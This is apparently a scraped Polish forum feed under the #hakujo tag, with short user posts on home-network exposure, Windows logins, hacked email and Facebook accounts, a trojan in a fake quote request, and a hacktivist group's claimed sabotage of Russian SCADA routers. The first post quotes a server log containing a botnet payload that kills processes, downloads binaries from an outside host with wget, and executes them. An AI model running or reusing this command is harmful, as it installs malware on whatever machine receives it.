postawiłem na WSL http.server w pythonie i wypluł mi on w pewnym momencie taki oto log:

172.20.4x.x - - [30/Dec/2024 18:30:21] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+njvwa4+dbda7;wget+http:/\/fniew.eye-network.ru/dbda7;chmod+777+dbda7;./dbda7+jaws;rm+-rf+dbda7;wget+http:/\/fniew.eye-network.ru/wheiuwa4;chmod+777+wheiuwa4;./wheiuwa4+jaws;rm+-rf+wheiuwa4 HTTP/1.1" 404 -


zastanawiam się jakim cudem był on otwarty na świat skoro mam wewnętrzne IP? Mój ISP to mała, osiedlowa firemka i byłem zawsze pewny, że nic ode mnie nie ma prawa nasłuchiwać po drugiej stronie ISPowego switcha, który zapewne jest gdzieś w piwnicy (ale słabo znam się na sieciach).

Moja
  • 3
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

@klamkaodokna:
172.20 to nadal wewnętrzna adresacja. Masz podgląd do konfiguracji na głównym routerze? Obstawiam że maska 24 albo i więcej i wszyscy się widzą wzajemnie.
ISP upchał wielu klientów w 1 podsieci żeby zaoszczędzić na adresacji.
  • Odpowiedz
Mireczki, czy ktoś z Was jest mi w stanie pomóc, w jaki sposób wyłączyć wpisywanie hasła podczas logowania w windows 11? Windows jest wykastrowany z telemetrii, i innych pierdół programem AME 11. Normalnymi sposobami nie ma możliwości tego zrobić, brak standardowych opcji wyłączenia hasła. Będe wdzięczny za pomoc. #windows #programowanie #hakujo
  • 10
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

P. S Windows 11 home.


@patryk747: To by mogło tłumaczyć wygląd netplwiz.
W którejś aktualizacji do Windows 10 Home wycięli z obsługi edytor zasad grup (GPO), uznając że edycje Home nie powinny mieć tej funkcji. Mogło się dostać rykoszetem innym funkcjom.

Można to połaczyć z zamierzeniami MS co do edycji Home Windowsa i jak nagabują do kupowania usług MS. Mają zarys tego jak chcą żeby było użytkowane.
  • Odpowiedz
Ja p------ę, w historii logowania na mailu pokazało mi że od 18 czerwca dokonano 2314 nieudanych prób zalogowania się na mojego maila, a wczoraj zablokowali mi to konto za nietypową aktywność ( _)
#hakujo
  • 2
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

  • 0
@Cinoski: Może jest jakiś wyciek, o którym jeszcze nie wiadomo publicznie. Np. taki mBank miał wyciek, o którym nie poinformował klientów.
  • Odpowiedz
Grupa hakerów One Fist twierdzi, że dokonała sabotażu routerów sterujących sprzętem przemysłowym w Rosji. Grupa ta dokonywała już wcześniej skutecznych ataków na Rosję, za co została nagrodzona przez MON Ukrainy.

Zaatakowaliśmy i wyłączyliśmy dziesiątki routerów w Mordorze jako rozgrzewkę i ćwiczenie przed tym, co ma nadejść. Wszystkie to były routery SCADA ICS, które sterują sprzętem przemysłowym. Każdy z nich wymagał włamania się do komputerów hosta, które je obsługują, i uzyskania dostępu do
zafrasowany - Grupa hakerów One Fist twierdzi, że dokonała sabotażu routerów sterując...

źródło: GWWdckAXsAAbgLY

Pobierz
  • 1
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

Uważajcie Mireczki w #pracbaza.
Dostałem właśnie zapytanie ofertowe (branża obróbka CNC) o rozszerzeniu .exe, oczywiście syf MSIL/GenKryptik_AGen.ATT trojan.
Firma wysyłająca legitna, tylko mail z nią nie związany m.kuszela@e-kancelaria.com

#hakujo #cyberbezpieczenstwo
  • 2
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

@kanarex Dostaję takie rzeczy na jeden z maili. Co ciekawe, ten syf przychodzi w formie pliku IMG. To jest format obrazu płyty. Od jakiegoś czasu Windows potrafi sam montować pliki iso i img, nie trzeba jak kiedyś mieć programów w stylu daemon tools. A antywirus na tej poczcie nie ogarnia plików img, więc wirusy dochodzą.
Nagłówki wyglądają tak, jakby się jakimś małym firmom włamywali na skrzynki i z nich rozsyłali.
  • Odpowiedz
Kurfa jaka akcja dziwna xD
Jesteśmy w #grecja w apartamencie z #booking i dzisiaj rano zaczął zamulać #internet (wifi) no spoko rozumiem od gorąca może tak być ( ͡º ͜ʖ͡º)
Ale jak wróciłem z morza to już było dead, widzę - jest modem no to go zresetowałem, nie podzialało ale zauważyłem, że odchodzą od niego dwa kable do szafki poniżej (zamkniętej
acidd - Kurfa jaka akcja dziwna xD
Jesteśmy w #grecja w apartamencie z #booking i dzi...

źródło: temp_file7341761935052681366

Pobierz
  • 12
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

@acidd: posłuchaj mnie uważnie, jutro o 19:45 masz samolot do meksyku.
Bilet wyśle Ci zaraz na e mail. Gdy wyjdziesz z lotniska pod czerwoną budką telefoniczną jest skrytka,
otwórz ją tajnym hasłem : hajduszoboszlo. W niej znajdziesz nowy dowód osobisty,
3000 pesos i kluczyki do mieszkania na przeciwko. Od dziś nazywasz się
Juan Pablo Fernandez Maria FC Barcelona Janusz Sergio Vasilii Szewczenko i jesteś rosyjskim imigrantem z Rumuni.
Pracujesz w zakładzie fryzjerskim 2 km od
  • Odpowiedz
Mirasy, znajomej ktoś włamał się na maila i na facebooka (pomimo uwierzytelniania dwuskładniowego). Co robić, w jaki sposób odzyskać konto? Uprzedziliśmy już znajomych przed wszelkimi wiadomościami czy linkami z profilu znajomej. Zgłosiłem też jej konto do fb, jako zhakowane. Ona z kolei wysłała zgłoszenie do wp (domena jej poczty w fb). #hakujo #facebook #hakerzy #pomocy #informatyka
  • 2
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

@bonzokosmita: powiedz znajomej niech się cieszy, że to tylko głupi facebook a nie bank lub ktoś nie dokonał przestępstwa z jej danych. niech to będzie przestroga i niech znajoma trochę ogarnie podstaw jakiegokolwiek bezpieczeństwa w sici jak blokady ekranu po odejściu od kompa wsród ludzi , logowanie się na innych urządzeiach niz swoje itd..
  • Odpowiedz
@bonzokosmita nie obsługuje kompa w przestrzeni publicznej. Loguje się tylko na swoich urządzeniach. Stosuje wszędzie uwierzytelnianie dwuskładnikowe. To nie takie proste jak napisałeś, problem jest bardziej złożony, a i haseł też nie ma w stylu „kotek1234”
  • Odpowiedz
mireczki,

działka wam normalnie allegro, czy mi się wydaje czy ddosują allegro.

mi od kilku dni nie udaje się wejść na platformę.

(sprawdzam
  • 5
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach